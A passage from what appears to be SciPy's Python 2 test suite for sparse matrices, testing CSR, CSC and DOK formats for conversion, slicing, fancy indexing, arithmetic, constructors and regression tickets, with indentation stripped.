b = self.spmatrix(D+3j).asformat(format)
assert_equal(b.format,format)
assert_array_equal(b.todense(), D+3j)
c = eval(format + '_matrix')(A)
assert_equal(c.format,format)
assert_array_equal(c.todense(), D)
def test_tobsr(self):
x = array([[1,0,2,0],[0,0,0,0],[0,0,4,5]])
y = array([[0,1,2],[3,0,5]])
A = kron(x,y)
Asp = self.spmatrix(A)
for format in ['bsr']:
fn = getattr(Asp, 'to' + format )
for X in [ 1, 2, 3, 6 ]:
for Y in [ 1, 2, 3, 4, 6, 12]:
assert_equal( fn(blocksize=(X,Y)).todense(), A)
def test_transpose(self):
a = self.datsp.transpose()
b = self.dat.transpose()
assert_array_equal(a.todense(), b)
assert_array_equal(a.transpose().todense(), self.dat)
assert_array_equal( self.spmatrix((3,4)).T.todense(), zeros((4,3)) )
def test_add_dense(self):
""" adding a dense matrix to a sparse matrix
"""
sum1 = self.dat + self.datsp
assert_array_equal(sum1, 2*self.dat)
sum2 = self.datsp + self.dat
assert_array_equal(sum2, 2*self.dat)
def test_sub_dense(self):
""" subtracting a dense matrix to/from a sparse matrix
"""
sum1 = 3*self.dat - self.datsp
assert_array_equal(sum1, 2*self.dat)
sum2 = 3*self.datsp - self.dat
assert_array_equal(sum2, 2*self.dat)
def test_copy(self):
""" Check whether the copy=True and copy=False keywords work
"""
A = self.datsp
#check that copy preserves format
assert_equal(A.copy().format, A.format)
assert_equal(A.__class__(A,copy=True).format, A.format)
assert_equal(A.__class__(A,copy=False).format, A.format)
assert_equal(A.copy().todense(), A.todense())
assert_equal(A.__class__(A,copy=True).todense(), A.todense())
assert_equal(A.__class__(A,copy=False).todense(), A.todense())
#check that XXX_matrix.toXXX() works
toself = getattr(A,'to' + A.format)
assert_equal(toself().format, A.format)
assert_equal(toself(copy=True).format, A.format)
assert_equal(toself(copy=False).format, A.format)
assert_equal(toself().todense(), A.todense())
assert_equal(toself(copy=True).todense(), A.todense())
assert_equal(toself(copy=False).todense(), A.todense())
# check whether the data is copied?
# TODO: deal with non-indexable types somehow
B = A.copy()
try:
B[0,0] += 1
assert_(B[0,0] != A[0,0])
except NotImplementedError:
# not all sparse matrices can be indexed
pass
except TypeError:
# not all sparse matrices can be indexed
pass
# Eventually we'd like to allow matrix products between dense
# and sparse matrices using the normal dot() function:
#def test_dense_dot_sparse(self):
# a = array([1.,2.,3.])
# dense_dot_dense = dot(a, self.dat)
# dense_dot_sparse = dot(a, self.datsp)
# assert_array_equal(dense_dot_dense, dense_dot_sparse)
#def test_sparse_dot_dense(self):
# b = array([1.,2.,3.,4.])
# dense_dot_dense = dot(self.dat, b)
# dense_dot_sparse = dot(self.datsp, b)
# assert_array_equal(dense_dot_dense, dense_dot_sparse)
class _TestInplaceArithmetic:
def test_imul_scalar(self):
a = self.datsp.copy()
a *= 2
assert_array_equal(self.dat*2,a.todense())
a = self.datsp.copy()
a *= 17.3
assert_array_equal(self.dat*17.3,a.todense())
def test_idiv_scalar(self):
a = self.datsp.copy()
a /= 2
assert_array_equal(self.dat/2,a.todense())
a = self.datsp.copy()
a /= 17.3
assert_array_equal(self.dat/17.3,a.todense())
class _TestGetSet:
def test_setelement(self):
A = self.spmatrix((3,4))
A[ 0, 0] = 0 # bug 870
A[ 1, 2] = 4.0
A[ 0, 1] = 3
A[ 2, 0] = 2.0
A[ 0,-1] = 8
A[-1,-2] = 7
A[ 0, 1] = 5
assert_array_equal(A.todense(),[[0,5,0,8],[0,0,4,0],[2,0,7,0]])
for ij in [(0,4),(-1,4),(3,0),(3,4),(3,-1)]:
assert_raises(IndexError, A.__setitem__, ij, 123.0)
for v in [[1,2,3], array([1,2,3])]:
assert_raises(ValueError, A.__setitem__, (0,0), v)
for v in [3j]:
assert_raises(TypeError, A.__setitem__, (0,0), v)
def test_getelement(self):
D = array([[1,0,0],
[4,3,0],
[0,2,0],
[0,0,0]])
A = self.spmatrix(D)
M,N = D.shape
for i in range(-M, M):
for j in range(-N, N):
assert_equal(A[i,j], D[i,j])
for ij in [(0,3),(-1,3),(4,0),(4,3),(4,-1)]:
assert_raises(IndexError, A.__getitem__, ij)
class _TestSolve:
def test_solve(self):
""" Test whether the lu_solve command segfaults, as reported by Nils
Wagner for a 64-bit machine, 02 March 2005 (EJS)
"""
n = 20
np.random.seed(0) #make tests repeatable
A = zeros((n,n), dtype=complex)
x = np.random.rand(n)
y = np.random.rand(n-1)+1j*np.random.rand(n-1)
r = np.random.rand(n)
for i in range(len(x)):
A[i,i] = x[i]
for i in range(len(y)):
A[i,i+1] = y[i]
A[i+1,i] = conjugate(y[i])
A = self.spmatrix(A)
x = splu(A).solve(r)
assert_almost_equal(A*x,r)
class _TestHorizSlicing:
"""Tests horizontal slicing (e.g. [0, :]). Tests for individual sparse
matrix types that implement this should derive from this class.
"""
def test_get_horiz_slice(self):
"""Test for new slice functionality (EJS)"""
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(B[1,:], A[1,:].todense())
assert_array_equal(B[1,2:5], A[1,2:5].todense())
C = matrix([[1, 2, 1], [4, 0, 6], [0, 0, 0], [0, 0, 1]])
D = self.spmatrix(C)
assert_array_equal(C[1, 1:3], D[1, 1:3].todense())
# Now test slicing when a row contains only zeros
E = matrix([[1, 2, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[1, 1:3], F[1, 1:3].todense())
assert_array_equal(E[2, -2:], F[2, -2:].A)
# The following should raise exceptions:
caught = 0
try:
a = A[:,11]
except IndexError:
caught += 1
try:
a = A[6,3:7]
except IndexError:
caught += 1
assert_(caught == 2)
class _TestVertSlicing:
"""Tests vertical slicing (e.g. [:, 0]). Tests for individual sparse
matrix types that implement this should derive from this class.
"""
def test_get_vert_slice(self):
"""Test for new slice functionality (EJS)"""
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(B[2:5,0], A[2:5,0].todense())
assert_array_equal(B[:,1], A[:,1].todense())
C = matrix([[1, 2, 1], [4, 0, 6], [0, 0, 0], [0, 0, 1]])
D = self.spmatrix(C)
assert_array_equal(C[1:3, 1], D[1:3, 1].todense())
assert_array_equal(C[:, 2], D[:, 2].todense())
# Now test slicing when a column contains only zeros
E = matrix([[1, 0, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[:, 1], F[:, 1].todense())
assert_array_equal(E[-2:, 2], F[-2:, 2].todense())
# The following should raise exceptions:
caught = 0
try:
a = A[:,11]
except IndexError:
caught += 1
try:
a = A[6,3:7]
except IndexError:
caught += 1
assert_(caught == 2)
class _TestBothSlicing:
"""Tests vertical and horizontal slicing (e.g. [:,0:2]). Tests for
individual sparse matrix types that implement this should derive from this
class.
"""
def test_get_slices(self):
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(A[2:5,0:3].todense(), B[2:5,0:3])
assert_array_equal(A[1:,:-1].todense(), B[1:,:-1])
assert_array_equal(A[:-1,1:].todense(), B[:-1,1:])
# Now test slicing when a column contains only zeros
E = matrix([[1, 0, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[1:2, 1:2], F[1:2, 1:2].todense())
assert_array_equal(E[:, 1:], F[:, 1:].todense())
class _TestFancyIndexing:
"""Tests fancy indexing features. The tests for any matrix formats
that implement these features should derive from this class.
"""
def test_fancy_indexing_set(self):
n, m = (5, 10)
def _test_set(i, j, nitems):
A = self.spmatrix((n, m))
A[i, j] = 1
assert_almost_equal(A.sum(), nitems)
assert_almost_equal(A[i, j], 1)
# [i,j]
for i, j in [(2, 3), (-1, 8), (-1, -2), (array(-1), -2), (-1, array(-2)),
(array(-1), array(-2))]:
_test_set(i, j, 1)
# [i,1:2]
for i, j in [(2, slice(m)), (2, slice(5, -2)), (array(2), slice(5, -2))]:
_test_set(i, j, 3)
def test_fancy_indexing(self):
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix( B )
# [i,j]
assert_equal(A[2,3], B[2,3])
assert_equal(A[-1,8], B[-1,8])
assert_equal(A[-1,-2],B[-1,-2])
assert_equal(A[array(-1),-2],B[-1,-2])
assert_equal(A[-1,array(-2)],B[-1,-2])
assert_equal(A[array(-1),array(-2)],B[-1,-2])
# [i,1:2]
assert_equal(A[2,:].todense(), B[2,:])
assert_equal(A[2,5:-2].todense(),B[2,5:-2])
assert_equal(A[array(2),5:-2].todense(),B[2,5:-2])
# [i,[1,2]]
assert_equal(A[3,[1,3]].todense(), B[3,[1,3]])
assert_equal(A[-1,[2,-5]].todense(),B[-1,[2,-5]])
assert_equal(A[array(-1),[2,-5]].todense(),B[-1,[2,-5]])
assert_equal(A[-1,array([2,-5])].todense(),B[-1,[2,-5]])
assert_equal(A[array(-1),array([2,-5])].todense(),B[-1,[2,-5]])
# [1:2,j]
assert_equal(A[:,2].todense(), B[:,2])
assert_equal(A[3:4,9].todense(), B[3:4,9])
assert_equal(A[1:4,-5].todense(),B[1:4,-5])
assert_equal(A[2:-1,3].todense(),B[2:-1,3])
assert_equal(A[2:-1,array(3)].todense(),B[2:-1,3])
# [1:2,1:2]
assert_equal(A[1:2,1:2].todense(),B[1:2,1:2])
assert_equal(A[4:,3:].todense(), B[4:,3:])
assert_equal(A[:4,:5].todense(), B[:4,:5])
assert_equal(A[2:-1,:5].todense(),B[2:-1,:5])
# [1:2,[1,2]]
assert_equal(A[:,[2,8,3,-1]].todense(),B[:,[2,8,3,-1]])
assert_equal(A[3:4,[9]].todense(), B[3:4,[9]])
assert_equal(A[1:4,[-1,-5]].todense(), B[1:4,[-1,-5]])
assert_equal(A[1:4,array([-1,-5])].todense(), B[1:4,[-1,-5]])
# [[1,2],j]
assert_equal(A[[1,3],3].todense(), B[[1,3],3])
assert_equal(A[[2,-5],-4].todense(), B[[2,-5],-4])
assert_equal(A[array([2,-5]),-4].todense(), B[[2,-5],-4])
assert_equal(A[[2,-5],array(-4)].todense(), B[[2,-5],-4])
assert_equal(A[array([2,-5]),array(-4)].todense(), B[[2,-5],-4])
# [[1,2],1:2]
assert_equal(A[[1,3],:].todense(), B[[1,3],:])
assert_equal(A[[2,-5],8:-1].todense(),B[[2,-5],8:-1])
assert_equal(A[array([2,-5]),8:-1].todense(),B[[2,-5],8:-1])
# [[1,2],[1,2]]
assert_equal(A[[1,3],[2,4]], B[[1,3],[2,4]])
assert_equal(A[[-1,-3],[2,-4]],B[[-1,-3],[2,-4]])
assert_equal(A[array([-1,-3]),[2,-4]],B[[-1,-3],[2,-4]])
assert_equal(A[[-1,-3],array([2,-4])],B[[-1,-3],[2,-4]])
assert_equal(A[array([-1,-3]),array([2,-4])],B[[-1,-3],[2,-4]])
# [[[1],[2]],[1,2]]
assert_equal(A[[[1],[3]],[2,4]].todense(), B[[[1],[3]],[2,4]])
assert_equal(A[[[-1],[-3],[-2]],[2,-4]].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[array([[-1],[-3],[-2]]),[2,-4]].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[[[-1],[-3],[-2]],array([2,-4])].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[array([[-1],[-3],[-2]]),array([2,-4])].todense(),B[[[-1],[-3],[-2]],[2,-4]])
# [i]
assert_equal(A[1,:].todense(), B[1,:])
assert_equal(A[-2,:].todense(),B[-2,:])
assert_equal(A[array(-2),:].todense(),B[-2,:])
# [1:2]
assert_equal(A[1:4].todense(), B[1:4])
assert_equal(A[1:-2].todense(),B[1:-2])
# [[1,2]]
assert_equal(A[[1,3]].todense(), B[[1,3]])
assert_equal(A[[-1,-3]].todense(),B[[-1,-3]])
assert_equal(A[array([-1,-3])].todense(),B[[-1,-3]])
# [[1,2],:][:,[1,2]]
assert_equal(A[[1,3],:][:,[2,4]].todense(), B[[1,3],:][:,[2,4]] )
assert_equal(A[[-1,-3],:][:,[2,-4]].todense(), B[[-1,-3],:][:,[2,-4]] )
assert_equal(A[array([-1,-3]),:][:,array([2,-4])].todense(), B[[-1,-3],:][:,[2,-4]] )
# [:,[1,2]][[1,2],:]
assert_equal(A[:,[1,3]][[2,4],:].todense(), B[:,[1,3]][[2,4],:] )
assert_equal(A[:,[-1,-3]][[2,-4],:].todense(), B[:,[-1,-3]][[2,-4],:] )
assert_equal(A[:,array([-1,-3])][array([2,-4]),:].todense(), B[:,[-1,-3]][[2,-4],:] )
# Check bug reported by Robert Cimrman:
# http://thread.gmane.org/gmane.comp.python.scientific.devel/7986
s = slice(int8(2),int8(4),None)
assert_equal(A[s,:].todense(), B[2:4,:])
assert_equal(A[:,s].todense(), B[:,2:4])
def test_fancy_indexing_randomized(self):
random.seed(0) # make runs repeatable
NUM_SAMPLES = 50
M = 6
N = 4
D = np.asmatrix(np.random.rand(M,N))
D = np.multiply(D, D > 0.5)
I = np.random.random_integers(-M + 1, M - 1, size=NUM_SAMPLES)
J = np.random.random_integers(-N + 1, N - 1, size=NUM_SAMPLES)
S = self.spmatrix(D)
assert_equal(S[I,J], D[I,J])
I_bad = I + M
J_bad = J - N
assert_raises(IndexError, S.__getitem__, (I_bad,J))
assert_raises(IndexError, S.__getitem__, (I,J_bad))
class _TestArithmetic:
"""
Test real/complex arithmetic
"""
def arith_init(self):
#these can be represented exactly in FP (so arithmetic should be exact)
self.A = matrix([[ -1.5, 6.5, 0, 2.25, 0, 0],
[ 3.125, -7.875, 0.625, 0, 0, 0],
[ 0, 0, -0.125, 1.0, 0, 0],
[ 0, 0, 8.375, 0, 0, 0]],'float64')
self.B = matrix([[ 0.375, 0, 0, 0, -5, 2.5],
[ 14.25, -3.75, 0, 0, -0.125, 0],
[ 0, 7.25, 0, 0, 0, 0],
[ 18.5, -0.0625, 0, 0, 0, 0]],'complex128')
self.B.imag = matrix([[ 1.25, 0, 0, 0, 6, -3.875],
[ 2.25, 4.125, 0, 0, 0, 2.75],
[ 0, 4.125, 0, 0, 0, 0],
[ -0.0625, 0, 0, 0, 0, 0]],'float64')
#fractions are all x/16ths
assert_array_equal((self.A*16).astype('int32'),16*self.A)
assert_array_equal((self.B.real*16).astype('int32'),16*self.B.real)
assert_array_equal((self.B.imag*16).astype('int32'),16*self.B.imag)
self.Asp = self.spmatrix(self.A)
self.Bsp = self.spmatrix(self.B)
def test_add_sub(self):
self.arith_init()
#basic tests
assert_array_equal((self.Asp+self.Bsp).todense(),self.A+self.B)
#check conversions
for x in supported_dtypes:
A = self.A.astype(x)
Asp = self.spmatrix(A)
for y in supported_dtypes:
B = self.B.astype(y)
Bsp = self.spmatrix(B)
#addition
D1 = A + B
S1 = Asp + Bsp
assert_equal(S1.dtype,D1.dtype)
assert_array_equal(S1.todense(),D1)
assert_array_equal(Asp + B,D1) #check sparse + dense
assert_array_equal(A + Bsp,D1) #check dense + sparse
#subtraction
D1 = A - B
S1 = Asp - Bsp
assert_equal(S1.dtype,D1.dtype)
assert_array_equal(S1.todense(),D1)
assert_array_equal(Asp - B,D1) #check sparse - dense
assert_array_equal(A - Bsp,D1) #check dense - sparse
def test_mu(self):
self.arith_init()
#basic tests
assert_array_equal((self.Asp*self.Bsp.T).todense(),self.A*self.B.T)
for x in supported_dtypes:
A = self.A.astype(x)
Asp = self.spmatrix(A)
for y in supported_dtypes:
B = self.B.astype(y)
Bsp = self.spmatrix(B)
D1 = A * B.T
S1 = Asp * Bsp.T
assert_array_equal(S1.todense(),D1)
assert_equal(S1.dtype,D1.dtype)
class _Test2DSlicingRegression:
def test_non_unit_stride_2d_indexing_raises_exception(self):
# Regression test -- used to silently ignore the stride.
try:
self.spmatrix((500, 500))[0:100:2, 0:100:2]
except ValueError:
return
assert_(False) # Should not happen.
class TestCSR(_TestCommon, _TestGetSet, _TestSolve,
_TestInplaceArithmetic, _TestArithmetic,
_TestHorizSlicing, _TestVertSlicing, _TestBothSlicing,
_TestFancyIndexing, _Test2DSlicingRegression, TestCase):
spmatrix = csr_matrix
@dec.knownfailureif(True, "Fancy indexing is known to be broken for CSR" \
" matrices")
def test_fancy_indexing_set(self):
_TestFancyIndexing.test_fancy_indexing_set(self)
def test_constructor1(self):
b = matrix([[0,4,0],
[3,0,0],
[0,2,0]],'d')
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[4,3,2])
assert_array_equal(bsp.indices,[1,0,1])
assert_array_equal(bsp.indptr,[0,1,2,3])
assert_equal(bsp.getnnz(),3)
assert_equal(bsp.getformat(),'csr')
assert_array_equal(bsp.todense(),b)
def test_constructor2(self):
b = zeros((6,6),'d')
b[3,4] = 5
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[5])
assert_array_equal(bsp.indices,[4])
assert_array_equal(bsp.indptr,[0,0,0,0,1,1,1])
assert_array_almost_equal(bsp.todense(),b)
def test_constructor3(self):
b = matrix([[1,0],
[0,2],
[3,0]],'d')
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[1,2,3])
assert_array_equal(bsp.indices,[0,1,0])
assert_array_equal(bsp.indptr,[0,1,2,3])
assert_array_almost_equal(bsp.todense(),b)
### currently disabled
## def test_constructor4(self):
## """try using int64 indices"""
## data = arange( 6 ) + 1
## col = array( [1, 2, 1, 0, 0, 2], dtype='int64' )
## ptr = array( [0, 2, 4, 6], dtype='int64' )
##
## a = csr_matrix( (data, col, ptr), shape = (3,3) )
##
## b = matrix([[0,1,2],
## [4,3,0],
## [5,0,6]],'d')
##
## assert_equal(a.indptr.dtype,numpy.dtype('int64'))
## assert_equal(a.indices.dtype,numpy.dtype('int64'))
## assert_array_equal(a.todense(),b)
def test_constructor4(self):
"""using (data, ij) format"""
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([ 6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
ij = vstack((row,col))
csr = csr_matrix((data,ij),(4,3))
assert_array_equal(arange(12).reshape(4,3),csr.todense())
def test_constructor5(self):
"""infer dimensions from arrays"""
indptr = array([0,1,3,3])
indices = array([0,5,1,2])
data = array([1,2,3,4])
csr = csr_matrix((data, indices, indptr))
assert_array_equal(csr.shape,(3,6))
def test_sort_indices(self):
data = arange( 5 )
indices = array( [7, 2, 1, 5, 4] )
indptr = array( [0, 3, 5] )
asp = csr_matrix( (data, indices, indptr), shape=(2,10) )
bsp = asp.copy()
asp.sort_indices( )
assert_array_equal(asp.indices,[1, 2, 7, 4, 5])
assert_array_equal(asp.todense(),bsp.todense())
def test_eliminate_zeros(self):
data = array( [1, 0, 0, 0, 2, 0, 3, 0] )
indices = array( [1, 2, 3, 4, 5, 6, 7, 8] )
indptr = array( [0, 3, 8] )
asp = csr_matrix( (data, indices, indptr), shape=(2,10) )
bsp = asp.copy()
asp.eliminate_zeros( )
assert_array_equal(asp.nnz, 3)
assert_array_equal(asp.data,[1, 2, 3])
assert_array_equal(asp.todense(),bsp.todense())
def test_ufuncs(self):
X = csr_matrix(np.arange(20).reshape(4, 5) / 20.)
for f in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc"]:
assert_equal(hasattr(csr_matrix, f), True)
X2 = getattr(X, f)()
assert_equal(X.shape, X2.shape)
assert_array_equal(X.indices, X2.indices)
assert_array_equal(X.indptr, X2.indptr)
assert_array_equal(X2.toarray(), getattr(np, f)(X.toarray()))
def test_unsorted_arithmetic(self):
data = arange( 5 )
indices = array( [7, 2, 1, 5, 4] )
indptr = array( [0, 3, 5] )
asp = csr_matrix( (data, indices, indptr), shape=(2,10) )
data = arange( 6 )
indices = array( [8, 1, 5, 7, 2, 4] )
indptr = array( [0, 2, 6] )
bsp = csr_matrix( (data, indices, indptr), shape=(2,10) )
assert_equal((asp + bsp).todense(), asp.todense() + bsp.todense())
class TestCSC(_TestCommon, _TestGetSet, _TestSolve,
_TestInplaceArithmetic, _TestArithmetic,
_TestHorizSlicing, _TestVertSlicing, _TestBothSlicing,
_TestFancyIndexing, _Test2DSlicingRegression, TestCase):
spmatrix = csc_matrix
@dec.knownfailureif(True, "Fancy indexing is known to be broken for CSC" \
" matrices")
def test_fancy_indexing_set(self):
_TestFancyIndexing.test_fancy_indexing_set(self)
def test_constructor1(self):
b = matrix([[1,0,0,0],[0,0,1,0],[0,2,0,3]],'d')
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[1,2,1,3])
assert_array_equal(bsp.indices,[0,2,1,2])
assert_array_equal(bsp.indptr,[0,1,2,3,4])
assert_equal(bsp.getnnz(),4)
assert_equal(bsp.shape,b.shape)
assert_equal(bsp.getformat(),'csc')
def test_constructor2(self):
b = zeros((6,6),'d')
b[2,4] = 5
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[5])
assert_array_equal(bsp.indices,[2])
assert_array_equal(bsp.indptr,[0,0,0,0,0,1,1])
def test_constructor3(self):
b = matrix([[1,0],[0,0],[0,2]],'d')
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[1,2])
assert_array_equal(bsp.indices,[0,2])
assert_array_equal(bsp.indptr,[0,1,2])
def test_constructor4(self):
"""using (data, ij) format"""
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([ 6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
ij = vstack((row,col))
csc = csc_matrix((data,ij),(4,3))
assert_array_equal(arange(12).reshape(4,3),csc.todense())
def test_constructor5(self):
"""infer dimensions from arrays"""
indptr = array([0,1,3,3])
indices = array([0,5,1,2])
data = array([1,2,3,4])
csc = csc_matrix((data, indices, indptr))
assert_array_equal(csc.shape,(6,3))
def test_eliminate_zeros(self):
data = array( [1, 0, 0, 0, 2, 0, 3, 0] )
indices = array( [1, 2, 3, 4, 5, 6, 7, 8] )
indptr = array( [0, 3, 8] )
asp = csc_matrix( (data, indices, indptr), shape=(10,2) )
bsp = asp.copy()
asp.eliminate_zeros( )
assert_array_equal(asp.nnz, 3)
assert_array_equal(asp.data,[1, 2, 3])
assert_array_equal(asp.todense(),bsp.todense())
def test_sort_indices(self):
data = arange( 5 )
row = array( [7, 2, 1, 5, 4] )
ptr = [0, 3, 5]
asp = csc_matrix( (data, row, ptr), shape=(10,2) )
bsp = asp.copy()
asp.sort_indices()
assert_array_equal(asp.indices,[1, 2, 7, 4, 5])
assert_array_equal(asp.todense(),bsp.todense())
def test_ufuncs(self):
X = csc_matrix(np.arange(21).reshape(7, 3) / 21.)
for f in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc"]:
assert_equal(hasattr(csr_matrix, f), True)
X2 = getattr(X, f)()
assert_equal(X.shape, X2.shape)
assert_array_equal(X.indices, X2.indices)
assert_array_equal(X.indptr, X2.indptr)
assert_array_equal(X2.toarray(), getattr(np, f)(X.toarray()))
def test_unsorted_arithmetic(self):
data = arange( 5 )
indices = array( [7, 2, 1, 5, 4] )
indptr = array( [0, 3, 5] )
asp = csc_matrix( (data, indices, indptr), shape=(10,2) )
data = arange( 6 )
indices = array( [8, 1, 5, 7, 2, 4] )
indptr = array( [0, 2, 6] )
bsp = csc_matrix( (data, indices, indptr), shape=(10,2) )
assert_equal((asp + bsp).todense(), asp.todense() + bsp.todense())
class TestDOK(_TestCommon, _TestGetSet, _TestSolve, TestCase):
spmatrix = dok_matrix
def test_mult(self):
A = dok_matrix((10,10))
A[0,3] = 10
A[5,6] = 20
D = A*A.T
E = A*A.H
assert_array_equal(D.A, E.A)
def test_add(self):
A = dok_matrix((3,2))
A[0,1] = -10
A[2,0] = 20
A = A + 10
B = matrix([[10, 0], [10, 10], [30, 10]])
assert_array_equal(A.todense(), B)
def test_convert(self):
"""Test provided by Andrew Straw. Fails in SciPy <= r1477.
"""
(m, n) = (6, 7)
a=dok_matrix((m, n))
# set a few elements, but none in the last column
a[2,1]=1
a[0,2]=2
a[3,1]=3
a[1,5]=4
a[4,3]=5
a[4,2]=6
# assert that the last column is all zeros
assert_array_equal( a.toarray()[:,n-1], zeros(m,) )
# make sure it still works for CSC format
csc=a.tocsc()
assert_array_equal( csc.toarray()[:,n-1], zeros(m,) )
# now test CSR
(m, n) = (n, m)
b = a.transpose()
assert_equal(b.shape, (m, n))
# assert that the last row is all zeros
assert_array_equal( b.toarray()[m-1,:], zeros(n,) )
# make sure it still works for CSR format
csr=b.tocsr()
assert_array_equal( csr.toarray()[m-1,:], zeros(n,))
def test_set_slice(self):
"""Test for slice functionality (EJS)"""
A = dok_matrix((5,10))
B = zeros((5,10), float)
A[:,0] = 1
B[:,0] = 1
assert_array_equal(A.todense(), B)
A[1,:] = 2
B[1,:] = 2
assert_array_equal(A.todense(), B)
A[:,:] = 3
B[:,:] = 3
assert_array_equal(A.todense(), B)
A[1:5, 3] = 4
B[1:5, 3] = 4
assert_array_equal(A.todense(), B)
A[1, 3:6] = 5
B[1, 3:6] = 5
assert_array_equal(A.todense(), B)
A[1:4, 3:6] = 6
B[1:4, 3:6] = 6
assert_array_equal(A.todense(), B)
A[1, 3:10:3] = 7
B[1, 3:10:3] = 7
assert_array_equal(A.todense(), B)
A[1:5, 0] = range(1,5)
B[1:5, 0] = range(1,5)
assert_array_equal(A.todense(), B)
A[0, 1:10:2] = xrange(1,10,2)
B[0, 1:10:2] = xrange(1,10,2)
assert_array_equal(A.todense(), B)
caught = 0
# The next 6 commands should raise exceptions
try:
A[0,0] = range(100)
except ValueError:
caught += 1
try:
A[0,0] = arange(100)
except ValueError:
caught += 1
try:
A[0,:] = range(100)
except ValueError:
caught += 1
try:
A[:,1] = range(100)
except ValueError:
caught += 1
try:
A[:,1] = A.copy()
except:
caught += 1
assert_equal(caught,5)
def test_ctor(self):
caught = 0
# Empty ctor
try:
A = dok_matrix()
except TypeError, e:
caught+=1
assert_equal(caught, 1)
# Dense ctor
b = matrix([[1,0,0,0],[0,0,1,0],[0,2,0,3]],'d')
A = dok_matrix(b)
assert_equal(A.todense(), b)
# Sparse ctor
c = csr_matrix(b)
assert_equal(A.todense(), c.todense())
def test_resize(self):
"""A couple basic tests of the resize() method.
resize(shape) resizes the array in-place.
"""
a = dok_matrix((5,5))
a[:,0] = 1
a.resize((2,2))
expected1 = array([[1,0],[1,0]])
assert_array_equal(a.todense(), expected1)
a.resize((3,2))
expected2 = array([[1,0],[1,0],[0,0]])
assert_array_equal(a.todense(), expected2)
def test_ticket1160(self):
"""Regression test for ticket #1160."""
a = dok_matrix((3,3))
a[0,0] = 0
# This assert would fail, because the above assignment would
# incorrectly call __set_item__ even though the value was 0.
assert_((0,0) not in a.keys(), "Unexpected entry (0,0) in keys")
# Slice assignments were also affected.
b = dok_matrix((3,3))
b[:,0] = 0
assert_(len(b.keys())==0, "Unexpected entries in keys")
# The following five tests are duplicates from _TestCommon, so they can be
# marked as knownfail for Python 2.4. Once 2.4 is no longer supported,
# these duplicates can be removed again.
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_add_dense(self):
""" adding a dense matrix to a sparse matrix
"""
sum1 = self.dat + self.datsp
assert_array_equal(sum1, 2*self.dat)
sum2 = self.datsp + self.dat
assert_array_equal(sum2, 2*self.dat)
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_radd(self):
a = self.dat.copy()
a[0,2] = 2.0
b = self.datsp
c = a + b
assert_array_equal(c,[[2,0,2,4],[6,0,2,0],[0,4,0,0]])
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_rsub(self):
assert_array_equal((self.dat - self.datsp),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
assert_array_equal((self.datsp - self.dat),[[0,0,0,0],[0,0,0,0],[0,0,0,0]])
A = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
assert_array_equal((self.dat - A),self.dat - A.todense())
assert_array_equal((A - self.dat),A.todense() - self.dat)
assert_array_equal(A.todense() - self.datsp,A.todense() - self.dat)
assert_array_equal(self.datsp - A.todense(),self.dat - A.todense())
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_matmat_sparse(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
a2 = array([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
b = matrix([[0,1],[1,0],[0,2]],'d')
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
assert_array_almost_equal((asp*bsp).todense(), a*b)
assert_array_almost_equal( asp*b, a*b)
assert_array_almost_equal( a*bsp, a*b)
assert_array_almost_equal( a2*bsp, a*b)
        # Now try performing cross-type multiplication:
csp = bsp.tocsc()
c = b
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
csp = bsp.tocsr()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
csp = bsp.tocoo()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal( asp*c, a*c)
assert_array_almost_equal( a*csp, a*c)
assert_array_almost_equal( a2*csp, a*c)
# Test provided by Andy Fraser, 2006-03-26
L = 30
frac = .3
random.seed(0) # make runs repeatable
A = zeros((L,2))
for i in xrange(L):
for j in xrange(2):
r = random.random()
if r < frac:
A[i,j] = r/frac
A = self.spmatrix(A)
B = A*A.T
